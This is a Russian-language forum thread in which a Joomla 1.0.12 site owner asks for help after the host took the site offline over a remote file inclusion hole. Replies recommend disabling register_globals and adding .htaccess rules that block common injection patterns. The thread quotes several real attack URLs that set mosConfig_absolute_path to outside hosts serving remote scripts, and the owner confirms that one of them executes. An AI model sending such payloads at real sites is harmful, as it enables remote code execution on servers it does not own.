обнаружена уязвимость позволяющая запускать вредоносный код - Безопасность сайтов на Joomla

Срочно нужна помощь. Не знал что у Joomla есть такое!(
Хостинг отключил сайт по причине опасности Joomla!
Написал, что на  сайте обнаружена уязвимость позволяющая запускать вредоносный код находящийся на других сайтах

Пример:
/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.smolen.org/c?
/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.krokrox.xpg.com.br/inbox.txt?
/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.spaminbox.xpg.com.br/vivo.txt?

Вопрос:
1. Что я сделал не правильно? Как такое могло случится?
2. Как это справить?

Где именно прописаны эти ссылки, где-то на сайте?

Какая у вас версия joomla?

Joomla 1.0.12 LE 2007




Эти ссылки не где не прописаны. Это мне хостинг в письме написал. Сказал, что можна запустить любой вредный скрипт по ссылке /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www………

И отключил сайт на время, пока все не отремонтирую(

Прошу совета, что сделать с mosConfig_absolute_path?

Хостер не уточнил куда именно запускается вредоносный скрипт - на хостинг или на машину пользователя.

Если я правильно понимаю, до тех пор, пока эти ссылки не написаны на сайте, никто на них нажать не сможет.

Защититься от этого вероятно можно используя файл ".htaccess".

Кстати, а как хостер узнал о такой "уязвимости". Это где-то как-то было использовано или это частное мнение кого-то из программеров хостера. Как они это проверяли?

Хостер не уточнил куда именно запускается вредоносный скрипт - на хостинг или на машину пользователя.

Если я правильно понимаю, до тех пор, пока эти ссылки не написаны на сайте, никто на них нажать не сможет.

Защититься от этого вероятно можно используя файл ".htaccess".

Для начала - это не ссылки. Такую команду может запустить любой любопытный пользователь с любого браузера. Тем самым он надеется подменить глабальные переменные сайта. Для защиты от таких чудаков нодо отключать register_globals = off в php.ini

Проверял, что прислал хостинг, вводил /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.krokrox.xpg.com.br/inbox.txt?
и вправду скрипт срабатывает и выводит Opa, enviado!
На сайте установлен Artio JoomSEF и после его отключения по линку /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.krokrox.xpg.com.br/inbox.txt?

Джумла выводит

«У Вас нет прав для просмотра этого ресурса.
Вы должны зайти как пользователь.»

как и должно быть.

Я видно где-то намудрил. Там что-то было не правильно установлено в .htaccess
Я так понимаю, что при установке Artio JoomSEF мне нужно было прописать запрет на /index.php


Спасибо всем)

В .htaccess должны присутствовать (в раскомментированном виде) такие директивы:

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]

# Block out any script that includes a <script> tag in URL

RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Send all blocked request to homepage with 403 Forbidden error!

RewriteRule ^(.*)$ index.php [F,L]

#
########## End - Rewrite rules to block out some common exploits